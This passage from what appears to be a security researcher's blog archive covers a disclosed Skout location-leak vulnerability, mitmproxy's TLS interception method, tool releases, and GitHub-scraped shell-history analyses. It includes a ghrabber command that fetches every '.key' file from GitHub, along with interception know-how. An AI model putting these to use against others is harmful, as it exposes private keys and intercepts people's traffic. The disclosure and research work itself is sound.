This is one of them.</p> <p>First, some background. Skout is a location-based mobile social network. The idea is to allow people to meet others in their area, semi-anonymously, get to know them, and then perhaps line up a meeting in meatspace. As far as I can tell, a huge fraction of the userbase are singles, using Skout as an ad-hoc dating app. Skout's scale is significant - they don't release exact user numbers, but I've seen claims of more than 10 million users, and a growth rate of a million users per month.</p> <p>In 2012, Skout went through a major PR catastrophe, when its service was linked to <a rel="external" href="http://bits.blogs.nytimes.com/2012/06/12/after-rapes-involving-children-skout-a-flirting-app-faces-crisis/">no fewer than 3 separate rapes of children</a> by adult men posing as teenagers. Skout immediately suspended the service for teenagers and went through a security revamp. A month later, <a rel="external" href="http://blog.skout.com/2012/07/13/teens-welcome-back-to-skout/">teens were allowed back</a>, with Skout making much of its new safety system, "advanced, proprietary algorithms" to weed out stalkers, and its long-term commitment to community safety.</p> <p>Given this background, the problem I found is simple but devastating. The Skout mobile application talks to Skout's servers through a simple API. When a user's profile is viewed, an unencrypted, plain-HTTP request is made to a path like this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>http://i22.skout.com/services/ServerService/getProfile</span></span></code></pre> <p>What's returned is a blob of XML containing the user's complete profile data. In fact, the profile data is <em>too</em> complete, including some information that is never actually used by the app. 
For example, we can see the user's exact date of birth:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="xml"><span class="giallo-l"><span>&lt;</span><span style="color: #22863A;">ax213:birthdayDate</span><span>&gt;xx/xx/1995&lt;/</span><span style="color: #22863A;">ax213:birthdayDate</span><span>&gt;</span></span></code></pre> <p>... but only the user's age in years is actually displayed. Most serious, however, is the high-precision location information that is returned in the ax213:homeLocation and ax213:location tags:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="xml"><span class="giallo-l"><span>&lt;</span><span style="color: #22863A;">ax213:latitude</span><span>&gt;-xx.xxx&lt;/</span><span style="color: #22863A;">ax213:latitude</span><span>&gt;</span></span> <span class="giallo-l"><span>&lt;</span><span style="color: #22863A;">ax213:longitude</span><span>&gt;xxx.xxx&lt;/</span><span style="color: #22863A;">ax213:longitude</span><span>&gt;</span></span></code></pre> <p>The three decimal places of precision in the co-ordinates is enough to locate a user to within about 110 meters north-south, and substantially less than that east-west depending on the distance from the equator. Here's what that looks like in a hypothetical example:</p> <div class="media"> <a href="skout-map.png"> <img src="skout-map.png" /> </a> </div> <p>I used <a rel="external" href="http://mitmproxy.org">mitmproxy</a> to observe Skout's traffic, but because the request is unencrypted any tool that allows you to inspect network traffic would be enough. The result is a stalker's wet dream - click on an anonymous profile, watch your network traffic, and find out exactly where the victim lives. I've also seen minors located at malls where they hang out, and at their schools... 
Given the scale of Skout's userbase and the ease with which the data can be obtained, I think there's a high likelihood that this issue has already been used for unsavoury purposes.</p> <p>I reported the vulnerability to Skout on the 24th of May. I'm happy to report that they immediately realised the seriousness of the situation, and their API stopped returning exact lat/long values a few hours later. Subsequent correspondence with Niklas Lindstrom, Skout's CTO, confirmed that they were taking steps to tighten security. I've encouraged Skout to speak about this publicly - their userbase needs to know about the issue, and needs to be reassured that action is being taken to ensure that this type of privacy breach won't ever recur.</p> How mitmproxy works 2013-05-16T00:00:00+00:00 2013-05-16T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/howitworks/ <p>I started work on <a rel="external" href="http://mitmproxy.org">mitmproxy</a> because I was frustrated with the available interception tools. I had a long list of minor complaints - they were insufficiently flexible, not programmable enough, mostly written in Java (a language I don't enjoy), and so forth. My most serious problem, though, was opacity. The best tools were all closed source and commercial. SSL interception is a complicated and delicate process, and after a certain point, not understanding precisely what your proxy is doing just doesn't fly.</p> <p>The text below is now part of the <a rel="external" href="http://mitmproxy.org/doc/index.html">official documentation</a> of mitmproxy. It's a detailed description of mitmproxy's interception process, and is more or less the overview document I wish I'd had when I first started the project. 
I proceed by example, starting with the simplest unencrypted explicit proxying, and working up to the most complicated interaction - transparent proxying of SSL-protected traffic<sup class="footnote-reference"><a href="#ssl">1</a></sup> in the presence of <a rel="external" href="http://en.wikipedia.org/wiki/Server_Name_Indication">SNI</a>.</p> <h2 id="explicit-http">Explicit HTTP</h2> <p>Configuring the client to use mitmproxy as an explicit proxy is the simplest and most reliable way to intercept traffic. The proxy protocol is codified in the <a rel="external" href="http://www.ietf.org/rfc/rfc2068.txt">HTTP RFC</a>, so the behaviour of both the client and the server is well defined, and usually reliable. In the simplest possible interaction with mitmproxy, a client connects directly to the proxy and makes a request that looks like this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>GET http://example.com/index.html HTTP/1.1</span></span></code></pre> <p>This is a proxy GET request - an extended form of the vanilla HTTP GET request that includes a scheme and host specification, so it carries all the information mitmproxy needs to relay the request upstream.</p> <div class="media"> <a href="explicit.png"> <img src="explicit.png" /> </a> </div><table class="table"> <tbody> <tr> <td><b>1</b></td> <td>The client connects to the proxy and makes a request.</td> </tr> <tr> <td><b>2</b></td> <td>Mitmproxy connects to the upstream server and simply forwards the request on.</td> </tr> </tbody> </table> <h2 id="explicit-https">Explicit HTTPS</h2> <p>The process for an explicitly proxied HTTPS connection is quite different. 
The client connects to the proxy and makes a request that looks like this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>CONNECT example.com:443 HTTP/1.1</span></span></code></pre> <p>A conventional proxy can neither view nor manipulate an SSL-encrypted data stream, so a CONNECT request simply asks the proxy to open a pipe between the client and server. The proxy here is just a facilitator - it blindly forwards data in both directions without knowing anything about the contents. The negotiation of the SSL connection happens over this pipe, and the subsequent flow of requests and responses is completely opaque to the proxy.</p> <h3 id="the-mitm-in-mitmproxy">The MITM in mitmproxy</h3> <p>This is where mitmproxy's fundamental trick comes into play. The MITM in its name stands for Man-In-The-Middle - a reference to the process we use to intercept and interfere with these theoretically opaque data streams. The basic idea is to pretend to be the server to the client, and pretend to be the client to the server, while we sit in the middle decoding traffic from both sides. The tricky part is that the <a rel="external" href="http://en.wikipedia.org/wiki/Certificate_authority">Certificate Authority</a> system is designed to prevent exactly this attack, by allowing a trusted third party to cryptographically sign a server's SSL certificates to verify that they are legit. If this signature doesn't match or is from a non-trusted party, a secure client will simply drop the connection and refuse to proceed. Despite the many shortcomings of the CA system as it exists today, this is usually fatal to attempts to MITM an SSL connection for analysis. Our answer to this conundrum is to become a trusted Certificate Authority ourselves. Mitmproxy includes a full CA implementation that generates interception certificates on the fly. 
To get the client to trust these certificates, we <a rel="external" href="http://mitmproxy.org/doc/ssl.html">register mitmproxy as a trusted CA with the device manually</a>.</p> <h3 id="complication-1-what-s-the-remote-hostname">Complication 1: What's the remote hostname?</h3> <p>To proceed with this plan, we need to know the domain name to use in the interception certificate - the client will verify that the certificate is for the domain it's connecting to, and abort if this is not the case. At first blush, it seems that the CONNECT request above gives us all we need - in this example, both of these values are "example.com". But what if the client had initiated the connection as follows:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>CONNECT 10.1.1.1:443 HTTP/1.1</span></span></code></pre> <p>Using the IP address is perfectly legitimate because it gives us enough information to initiate the pipe, even though it doesn't reveal the remote hostname.</p> <p>Mitmproxy has a cunning mechanism that smooths this over - <a rel="external" href="http://mitmproxy.org/doc/features/upstreamcerts.html">upstream certificate sniffing</a>. As soon as we see the CONNECT request, we pause the client part of the conversation, and initiate a simultaneous connection to the server. We complete the SSL handshake with the server, and inspect the certificates it used. Now, we use the Common Name in the upstream SSL certificates to generate the dummy certificate for the client. Voila, we have the correct hostname to present to the client, even if it was never specified.</p> <h3 id="complication-2-subject-alternative-name">Complication 2: Subject Alternative Name</h3> <p>Enter the next complication. Sometimes, the certificate Common Name is not, in fact, the hostname that the client is connecting to. 
This is because of the optional <a rel="external" href="http://en.wikipedia.org/wiki/SubjectAltName">Subject Alternative Name</a> field in the SSL certificate that allows an arbitrary number of alternative domains to be specified. If the expected domain matches any of these, the client will proceed, even though the domain doesn't match the certificate Common Name. The answer here is simple: when we extract the CN from the upstream cert, we also extract the SANs, and add them to the generated dummy certificate.</p> <h3 id="complication-3-server-name-indication">Complication 3: Server Name Indication</h3> <p>One of the big limitations of vanilla SSL is that each certificate requires its own IP address. This means that you can't do virtual hosting where multiple domains with independent certificates share the same IP address. In a world with a rapidly shrinking IPv4 address pool this is a problem, and we have a solution in the form of the <a rel="external" href="http://en.wikipedia.org/wiki/Server_Name_Indication">Server Name Indication</a> extension to the SSL and TLS protocols. This lets the client specify the remote server name at the start of the SSL handshake, which then lets the server select the right certificate to complete the process.</p> <p>SNI breaks our upstream certificate sniffing process, because when we connect without using SNI, we get served a default certificate that may have nothing to do with the certificate expected by the client. The solution is another tricky complication to the client connection process. After the client connects, we allow the SSL handshake to continue until just <em>after</em> the SNI value has been passed to us. Now we can pause the conversation, and initiate an upstream connection using the correct SNI value, which then serves us the correct upstream certificate, from which we can extract the expected CN and SANs.</p> <p>There's another wrinkle here. 
Due to a limitation of the SSL library mitmproxy uses, we can't detect that a connection <em>hasn't</em> sent an SNI request until it's too late for upstream certificate sniffing. In practice, we therefore make a vanilla SSL connection upstream to sniff non-SNI certificates, and then discard the connection if the client sends an SNI notification. If you're watching your traffic with a packet sniffer, you'll see two connections to the server when an SNI request is made, the first of which is immediately closed after the SSL handshake. Luckily, this is almost never an issue in practice.</p> <h3 id="putting-it-all-together">Putting it all together</h3> <p>Let's put all of this together into the complete explicitly proxied HTTPS flow.</p> <div class="media"> <a href="explicit_https.png"> <img src="explicit_https.png" /> </a> </div><table class="table"> <tbody> <tr> <td><b>1</b></td> <td>The client makes a connection to mitmproxy, and issues an HTTP CONNECT request.</td> </tr> <tr> <td><b>2</b></td> <td>Mitmproxy responds with a 200 Connection Established, as if it has set up the CONNECT pipe.</td> </tr> <tr> <td><b>3</b></td> <td>The client believes it's talking to the remote server, and initiates the SSL connection. 
It uses SNI to indicate the hostname it is connecting to.</td> </tr> <tr> <td><b>4</b></td> <td>Mitmproxy connects to the server, and establishes an SSL connection using the SNI hostname indicated by the client.</td> </tr> <tr> <td><b>5</b></td> <td>The server responds with the matching SSL certificate, which contains the CN and SAN values needed to generate the interception certificate.</td> </tr> <tr> <td><b>6</b></td> <td>Mitmproxy generates the interception cert, and continues the client SSL handshake paused in step 3.</td> </tr> <tr> <td><b>7</b></td> <td>The client sends the request over the established SSL connection.</td> </tr> <tr> <td><b>8</b></td> <td>Mitmproxy passes the request on to the server over the SSL connection initiated in step 4.</td> </tr> </tbody> </table> <h2 id="transparent-http">Transparent HTTP</h2> <p>When a transparent proxy is used, the HTTP/S connection is redirected into a proxy at the network layer, without any client configuration being required. This makes transparent proxying ideal for those situations where you can't change client behaviour - proxy-oblivious Android applications being a common example.</p> <p>To achieve this, we need to introduce two extra components. The first is a redirection mechanism that transparently reroutes a TCP connection destined for a server on the Internet to a listening proxy server. This usually takes the form of a firewall on the same host as the proxy server - <a rel="external" href="http://www.netfilter.org/">iptables</a> on Linux or <a rel="external" href="http://en.wikipedia.org/wiki/PF_(firewall)">pf</a> on OSX. 
Once the client has initiated the connection, it makes a vanilla HTTP request, which might look something like this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>GET /index.html HTTP/1.1</span></span></code></pre> <p>Note that this request differs from the explicit proxy variation, in that it omits the scheme and hostname. How, then, do we know which upstream host to forward the request to? The routing mechanism that has performed the redirection keeps track of the original destination for us. Each routing mechanism has a different way of exposing this data, so this introduces the second component required for working transparent proxying: a host module that knows how to retrieve the original destination address from the router. In mitmproxy, this takes the form of a built-in set of <a rel="external" href="https://github.com/cortesi/mitmproxy/tree/master/libmproxy/platform">modules</a> that know how to talk to each platform's redirection mechanism. Once we have this information, the process is fairly straight-forward.</p> <div class="media"> <a href="transparent.png"> <img src="transparent.png" /> </a> </div><table class="table"> <tbody> <tr> <td><b>1</b></td> <td>The client makes a connection to the server.</td> </tr> <tr> <td><b>2</b></td> <td>The router redirects the connection to mitmproxy, which is typically listening on a local port of the same host. Mitmproxy then consults the routing mechanism to establish what the original destination was.</td> </tr> <tr> <td><b>3</b></td> <td>Now, we simply read the client's request...</td> </tr> <tr> <td><b>4</b></td> <td>... and forward it upstream.</td> </tr> </tbody> </table> <h2 id="transparent-https">Transparent HTTPS</h2> <p>The first step is to determine whether we should treat an incoming connection as HTTPS. The mechanism for doing this is simple - we use the routing mechanism to find out what the original destination port is. 
By default, we treat all traffic destined for ports 443 and 8443 as SSL.</p> <p>From here, the process is a merger of the methods we've described for transparently proxying HTTP, and explicitly proxying HTTPS. We use the routing mechanism to establish the upstream server address, and then proceed as for explicit HTTPS connections to establish the CN and SANs, and cope with SNI.</p> <div class="media"> <a href="transparent_https.png"> <img src="transparent_https.png" /> </a> </div><table class="table"> <tbody> <tr> <td><b>1</b></td> <td>The client makes a connection to the server.</td> </tr> <tr> <td><b>2</b></td> <td>The router redirects the connection to mitmproxy, which is typically listening on a local port of the same host. Mitmproxy then consults the routing mechanism to establish what the original destination was.</td> </tr> <tr> <td><b>3</b></td> <td>The client believes it's talking to the remote server, and initiates the SSL connection. It uses SNI to indicate the hostname it is connecting to.</td> </tr> <tr> <td><b>4</b></td> <td>Mitmproxy connects to the server, and establishes an SSL connection using the SNI hostname indicated by the client.</td> </tr> <tr> <td><b>5</b></td> <td>The server responds with the matching SSL certificate, which contains the CN and SAN values needed to generate the interception certificate.</td> </tr> <tr> <td><b>6</b></td> <td>Mitmproxy generates the interception cert, and continues the client SSL handshake paused in step 3.</td> </tr> <tr> <td><b>7</b></td> <td>The client sends the request over the established SSL connection.</td> </tr> <tr> <td><b>8</b></td> <td>Mitmproxy passes the request on to the server over the SSL connection initiated in step 4.</td> </tr> </tbody> </table> <div class="footnote-definition" id="ssl"><sup class="footnote-definition-label">1</sup> <p>I use "SSL" to refer to both SSL and TLS in the generic sense, unless otherwise specified.</p> </div> pathod 0.9 2013-05-16T00:00:00+00:00 
2013-05-16T00:00:00+00:00 https://corte.si/posts/code/pathod/announce0_9/ <p>I've just released <a rel="external" href="http://pathod.net">pathod 0.9</a>, my toolset for crafting malicious and interesting HTTP traffic. Apart from the usual range of stability improvements and bugfixes, this release introduces a major new set of features: proxy support. <a rel="external" href="http://pathod.net/docs/pathoc">Pathoc</a>, the client, has sprouted support for vanilla proxy connections, and is also able to tunnel through proxies using CONNECT. <a rel="external" href="http://pathod.net/docs/pathod">Pathod</a>, the server, will now respond to proxy requests as well as straight HTTP, and will treat CONNECT requests as SSL with on-the-fly generation of dummy certificates.</p> <p>The Pathod changes in particular open a whole new range of possibilities for fuzzing and other mischief. Any client with proxy support can be directed at Pathod, which can then impersonate the upstream server and return the creatively malicious response of your choice.</p> <p>There have also been some organizational changes. This is the first release based on <a rel="external" href="http://github.com/cortesi/netlib">netlib</a>, the gonzo networking library pathod now shares with <a rel="external" href="http://mitmproxy.org">mitmproxy</a>. Over the next while, pathod and mitmproxy will move closer together. As a sign of this, the major version numbers between these projects are now synchronized.</p> mitmproxy 0.9 2013-05-15T00:00:00+00:00 2013-05-15T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce0_9/ <div class="media"> <a href="mitmproxy_0_9.png"> <img src="mitmproxy_0_9.png" /> </a> </div> <p>I'm happy to announce the release of <a rel="external" href="http://mitmproxy.org">mitmproxy 0.9</a>. This is a major release, with huge improvements to mitmproxy pretty much across the board. So much has happened in the year since the last release that it's difficult to pick out the headlines. 
Mitmproxy is now faster, more scalable, and works in more tricky corner cases than ever before. Full transparent mode support has landed for both Linux and OSX. Content decoding is much nicer, with a slew of new targets like <a rel="external" href="http://en.wikipedia.org/wiki/Action_Message_Format">AMF</a> and <a rel="external" href="https://code.google.com/p/protobuf/">Protocol Buffers</a>. We now have a WSGI container that allows you to host web apps right in the proxy. In addition to this, there is a myriad of new features, bugfixes and other small improvements.</p> <p>There are also changes afoot in the project itself. As a first step, I've moved mitmproxy from the GPLv3 to an MIT license. I hope that this will make it easier for people to use the project in more contexts. Keep an eye out for more changes along these lines soon, geared to broadening participation in the project.</p> <h2 id="changelog">Changelog</h2> <ul> <li>Upstream certs mode is now the default.</li> <li>Add a WSGI container that lets you host in-proxy web applications.</li> <li>Full transparent proxy support for Linux and OSX.</li> <li>Introduce netlib, a common codebase for <a rel="external" href="http://github.com/cortesi/netlib">mitmproxy and pathod</a>.</li> <li>Full support for SNI.</li> <li>Color palettes for mitmproxy, tailored for light and dark terminal backgrounds.</li> <li>Stream flows to file as responses arrive with the "W" shortcut in mitmproxy.</li> <li>Extend the filter language, including ~d domain match operator, ~a to match asset flows (js, images, css).</li> <li>Follow mode in mitmproxy ("F" shortcut) to "tail" flows as they arrive.</li> <li>--dummy-certs option to specify and preserve the dummy certificate directory.</li> <li>Server replay from the current captured buffer.</li> <li>Huge improvements in content views. 
We now have viewers for AMF, HTML, JSON, Javascript, images, XML, URL-encoded forms, as well as hexadecimal and raw views.</li> <li>Add Set Headers, analogous to replacement hooks. Defines headers that are set on flows, based on a matching pattern.</li> <li>A graphical editor for path components in mitmproxy.</li> <li>A small set of standard user-agent strings, which can be used easily in the header editor.</li> <li>Proxy authentication to limit access to mitmproxy</li> </ul> Google, destroyer of ecosystems 2013-03-14T00:00:00+00:00 2013-03-14T00:00:00+00:00 https://corte.si/posts/socialmedia/rip-google-reader/ <p>Google has finally shut down a service I actually care about - <a rel="external" href="http://googlereader.blogspot.co.nz/2013/03/powering-down-google-reader.html">Google Reader will die a graceless, undignified death on July 1, 2013</a>. The only way Google could inconvenience me more would be to shut down search itself, and yet - I'm not angry that Google is shutting Reader down. I'm furious that they ever entered the RSS game at all. Consider this quote from a TechCrunch <a rel="external" href="http://techcrunch.com/2006/01/10/searchfox-to-shut-down/">article in January 2006</a>. Here, Michael Arrington ends an article about the shutdown of a feed reader service with a statement that seems truly bizarre today:</p> <blockquote> <p>The RSS reader space is becoming hyper competitive, with dozens of different choices for readers.</p> </blockquote> <p>A hyper competitive space with dozens of choices? Reader made its first public appearance a couple of months before this, in October 2005. I remember this period well - it was a time of immense excitement, when RSS seemed to be the future, the news ecosystem was vibrant, and this thing called the blogosphere, fueled by peer subscription, was doubling in size every six months. It was into this magic garden that Google wandered, like a giant toddler leaving destruction in its wake. 
Reader was undeniably a good product, but its best quality was also its worst: it was free. Subsidized by Google's immense search profits, it never had to earn its keep, and its competitors started to die. Over time, the "hyper competitive" RSS reader market turned into a monoculture. Today, on the eve of its shutdown, RSS more or less means "Google Reader" to a large fraction of readers, to the extent that even the best feed readers on iOS are just Google Reader clients<sup class="footnote-reference"><a href="#1">1</a></sup>.</p> <p>The sudden shock of Reader's closure will harm a news ecosystem that I <a href="https://corte.si/posts/socialmedia/trouble-with-social-news/">already believe to be deeply ill</a>. Google Reader is not just a core part of my information diet - it's also the most direct channel I have to readers of this blog. As of today, the Reader subscriber count for <a rel="external" href="http://corte.si">corte.si</a> stands at about 3 times the total number of other subscribers combined. Some of these readers will migrate to other services and stay in touch, but many will inevitably abandon the idea of direct subscription to blogs entirely. In the next few months, tens of thousands of small blogs will lose direct contact with a large fraction of their readers.</p> <p>The truth is this: Google destroyed the RSS feed reader ecosystem with a subsidized product, stifling its competitors and killing innovation. It then neglected Google Reader itself for years, after it had effectively become the only player. Today it does further damage by buggering up the already beleaguered links between publishers and readers. It would have been better for the Internet if Reader had never been at all.</p> <div class="footnote-definition" id="1"><sup class="footnote-definition-label">1</sup> <p>Yes, I'm aware that there are a few hardy outliers still playing in this place. 
My own logs show that their reach is insignificant, though, and when I tried to shift my subscriptions about a year ago, there was nothing as good as Reader itself. Once <a rel="external" href="http://www.newsblur.com">NewsBlur's</a> servers have recovered, I definitely plan to give it another shot.</p> </div> Things I found on GitHub: aspell custom dictionary entries 2013-02-26T00:00:00+00:00 2013-02-26T00:00:00+00:00 https://corte.si/posts/hacks/github-spellingdicts/ <p>I've been doing a series of posts looking at data gathered with <a rel="external" href="https://github.com/cortesi/ghrabber">ghrabber</a>, a simple tool I wrote that lets you grab files matching a search specification from GitHub. Last week, I looked at <a href="https://corte.si/posts/hacks/github-shhistory/">shell history</a> in the broad, and then specifically at <a href="https://corte.si/posts/hacks/github-pipechains/">pipe chains</a>. Today, I move on to something different - custom <a rel="external" href="http://aspell.net/">aspell</a> dictionaries. When aspell finds a word it doesn't recognize, the user is prompted to correct it, ignore it, or add it to a custom dictionary so that it will be recognized as correct in future. These words are written to the user's custom dictionary - a file named <strong>.aspell_en_pw</strong> that lives in the user's home directory. It turns out that 30 people have checked aspell dictionaries into GitHub, containing a total of 9501 custom words. 
The chart below shows the top 50 words, with the X-axis showing the percentage of files the word appeared in.</p> <div class="media"> <a href="aspell.png"> <img src="aspell.png" /> </a> </div> <p>There were a few requests for the raw data behind the previous two posts, so this time round you can also <a href="https://corte.si/posts/hacks/github-spellingdicts/./aspell-all.csv">download a CSV file</a> with the occurrence totals for each word in the dataset.</p> Things I found on GitHub: pipe chains 2013-02-22T00:00:00+00:00 2013-02-22T00:00:00+00:00 https://corte.si/posts/hacks/github-pipechains/ <p>Earlier this week I published <a rel="external" href="https://github.com/cortesi/ghrabber">ghrabber</a>, a simple tool that lets you grab files matching an arbitrary search specification from GitHub. I used ghrabber to retrieve all the bash_history and zsh_history files accidentally checked in to repos, and took <a rel="external" href="http://corte.si/posts/hacks/github-shhistory/index.html">a light look at the dataset with some simple graphs</a>. In total, I obtained 234 shell history files with 165k individual command entries. This is a very rare opportunity to "shoulder-surf", to actually see what people <em>do</em> at the command prompt, and perhaps get some insights into how to improve things.</p> <p>Along those lines, today's post looks at pipe chains - that is, compound commands that pipe the output of one command to another. The pipe operator lies at the core of the Unix command-line philosophy. The fact that we can easily compose complex operations is the reason why we are able to write small tools that "do one thing well" without losing generality. The shell history data on Github can give us some real data about what people do with composed commands, and how they do it.</p> <div class="media"> <a href="pipechains.png"> <img src="pipechains.png" /> </a> </div> <p>It turns out that about 2% of all commands issued on the command-line use pipes. 
The graph above shows the prevalence of the most common pipe chains - that is, what percentage of the users in my sample used each chain. There's a lot of fascinating stuff we can read straight from this image.</p> <p>Starting at the top, the first thing we notice is how widely used the <strong>ps | grep</strong> chain is. About 17% of users in my sample used this chain - given the type of data we have, the real-world prevalence would surely be higher still. I've just been extolling the virtues of small tools and composability, but in this case practicality should beat purity. I suggest that everyone should have a command-alias similar to this in their shell configuration:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #D73A49;">alias</span><span> pg</span><span style="color: #D73A49;">=</span><span style="color: #032F62;">&quot;ps aux | grep&quot;</span></span></code></pre> <p>I've added this to my .zshrc today, and I've already used it twice.</p> <p>Next up, we have the <strong>ls | grep</strong> pipes. The vast majority of uses here could actually be accomplished using the shell's filename generation mechanism. This ranges from simple redundancies like grepping for file extensions, to performing quite complex matching operations that could be done using the shell's advanced glob operations. I'm guilty of this myself - I rarely use features like recursive globbing, expansions using character ranges, case insensitive globbing, and so forth. I've brushed up on <a rel="external" href="http://linux.die.net/man/1/zshexpn">filename expansion for my chosen shell</a>, and perhaps you should too.</p> <p>The last thing I want to point out is a pattern that's genuinely dangerous - <strong>curl | bash</strong>, along with its cousins <strong>curl | sh</strong> and <strong>wget | sh</strong>. 
Unfortunately, this has become the recommended installation pattern for some tools - the vast majority of invocations here are for <a rel="external" href="https://rvm.io/">RVM</a> and <a rel="external" href="http://yeoman.io/">Yeoman</a>. I don't think it's a good idea to pipe anything from the web straight into a local shell, but the situation is made particularly dire by the fact that almost half of these invocations are either over plain HTTP or explicitly turn certificate validation off.</p> <p>I'll stop here, although there are interesting things to say about nearly every entry in the graph above. Next week, I'll move on from the shell history sample, and look at some other juicy datasets extracted using ghrabber.</p> Things I found on GitHub: shell history 2013-02-19T00:00:00+00:00 2013-02-19T00:00:00+00:00 https://corte.si/posts/hacks/github-shhistory/ <p>Github recently introduced hugely <a rel="external" href="https://github.com/blog/1381-a-whole-new-code-search">improved code search</a>, one of those rare moments when a service I use adds a feature that directly and measurably improves my life. Predictably, there was soon a <a rel="external" href="http://www.webmonkey.com/2013/01/users-scramble-as-github-search-exposes-passwords-security-details/">flurry</a> <a rel="external" href="http://www.scmagazine.com.au/News/330152,passwords-ssh-keys-exposed-on-github.aspx">of</a> <a rel="external" href="http://arstechnica.com/security/2013/01/psa-dont-upload-your-important-passwords-to-github/">breathless</a> stories about the security implications. This shouldn't have been news to anyone - by now, it should be clear that better search in almost any context has security or privacy implications, a law of the universe almost as solid as the second law of thermodynamics. 
We saw this with <a rel="external" href="http://www.securityfocus.com/news/11417">Google's own code search</a>, as well as <a rel="external" href="http://en.wikipedia.org/wiki/Google_hacking">Google proper</a>, Facebook's <a rel="external" href="http://actualfacebookgraphsearches.tumblr.com/">Graph Search</a> and even <a rel="external" href="http://www.wired.com/wiredenterprise/2013/02/microsoft-bing-fights-botnets/">Bing</a>. A certain fraction of people will always make mistakes, and any sufficiently powerful search will allow bad guys to find and take advantage of the outliers.</p> <p>After the dust had settled a bit I started wondering what else we could do with Github's search - other than snookering schmucks who checked in their private keys. I'm always enticed by data, and the combination of search and the ability to download raw checked-in files seemed like a promising avenue to explore. Let's see what we can come up with.</p> <h2 id="ghrabber-grab-files-from-github"><a rel="external" href="https://github.com/cortesi/ghrabber">ghrabber</a> - grab files from GitHub</h2> <p>First, some tooling. I've just released ghrabber, a simple tool that lets you grab all files matching a search specification from GitHub. Here, for instance, is an obvious wheeze - fetching all files with the extension ".key":</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">./ghrabber.py</span><span style="color: #032F62;"> &quot;extension:key&quot;</span></span></code></pre> <p>Downloaded files are saved locally to files named <strong>user.repository</strong>. Existing files with the same name are skipped, which means that you can reasonably efficiently stop and resume a ghrab.</p> <h2 id="shell-history-files">Shell history files</h2> <p>I've been having a lot of fun exploring Github with ghrabber. 
I'll return to this in future posts - today I'll start with a quick illustration of what can be done. One type of difficult-to-find information that is sometimes checked in to repos is shell history. Two simple ghrabber commands for the two most popular shells are all we need:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">./ghrabber.py</span><span style="color: #032F62;"> &quot;path:.bash_history&quot;</span></span></code></pre> <p>and</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">./ghrabber.py</span><span style="color: #032F62;"> &quot;path:.zsh_history&quot;</span></span></code></pre> <p>After cleaning the data a bit, I had 234 history files varying in length from 1 line to just over 10 thousand, containing a total of 165k entries. I fed this into <a rel="external" href="http://pandas.pydata.org/">Pandas</a> for analysis, parsing each command using a combination of hand-hacked heuristics and the built-in <a rel="external" href="http://docs.python.org/2/library/shlex.html">shlex</a> module. The remainder of this post is a light exploration of some approaches to this dataset, steering clear of the obvious and tediously well-covered security implications.</p> <div class="media"> <a href="topcmds.png"> <img src="topcmds.png" /> </a> </div> <p>One way to slice the data is to look at the percentage of history files a given command appears in. This gives us a nice listing of the top commands by user prevalence, which you can see in the graph on the left above. On the right, I've taken the same list of commands, and checked how many invocations are preceded by a <strong>man</strong> lookup for the command. This gives us an idea of which commonly-used commands have difficult or unintuitive interfaces. 
It's interesting that <strong>ln</strong> is right at the top of the list, considering how simple the command syntax is. My theory is that everyone forgets the order of the source and target files.</p> <div class="media"> <a href="editors.png"> <img src="editors.png" /> </a> </div><div class="media"> <a href="tmuxes.png"> <img src="tmuxes.png" /> </a> </div> <p>Since we have a list of the most widely used commands, it's also trivial to do silly popularity comparisons. Above is the obvious look at the state of the editor wars (vim is winning, folks), and a check on how <a rel="external" href="http://tmux.sourceforge.net/">tmux</a> is doing in supplanting screen (the faster the better).</p> <p><div class="media"> <a href="args-ssh.png"> <img src="args-ssh.png" /> </a> </div> <div class="media"> <a href="args-mkdir.png"> <img src="args-mkdir.png" /> </a> </div> <div class="media"> <a href="args-rm.png"> <img src="args-rm.png" /> </a> </div> <div class="media"> <a href="args-ls.png"> <img src="args-ls.png" /> </a> </div></p> <p>Another interesting thing to do is to look at the most commonly used flags to commands. I think having "real data" of command use may well guide us to design better command-line interfaces. I'd love to know the most common invocation flags for some of the tools I write.</p> <p>I'll stop there. The data pool in this case is very deep, and there is a huge range of interesting bits of command-line ethnography that could be done. Stay posted for more in the coming weeks.</p> The trouble with social news 2013-01-24T00:00:00+00:00 2013-01-24T00:00:00+00:00 https://corte.si/posts/socialmedia/trouble-with-social-news/ <p>There is something terribly awry with the social news ecosystem. 
This is a feeling that's been growing on me over the last few years, and is the reason why I've cut both <a rel="external" href="http://reddit.com">Reddit</a> and <a rel="external" href="http://news.ycombinator.com">Hacker News</a> (who together constitute pretty much all of "social news") out of my information diet. Although I've mulled over things in various conversations, I've never actually tried to put my feeling of unease in writing, until today. What's spurring me into action is a <a rel="external" href="http://yann.lecun.com/ex/pamphlets/publishing-models.html">proposal by Yann LeCun</a> that a model similar to social news be adopted for scientific peer review - self-assembled Reviewing Entities voting on streams of submitted papers, regulated by a reputation system for authors and reviewers. Basically, this is science a la Reddit: complete with subreddits, karma and upboats. I find the idea frankly terrifying.</p> <p>I guess it's time, then, to put finger to keyboard and lay out what disquiets me about social news.</p> <h2 id="karma-corrupts">Karma Corrupts</h2> <p>You start by introducing a reputation mechanism like <a rel="external" href="http://www.reddit.com/wiki/faq#toc_9">karma</a> to improve some outcome - say, to increase the quality of comments, or to apply a threshold to restrict voting to trustworthy community members. This seems like a plausible and even elegant mechanism at first, until you discover the terrible 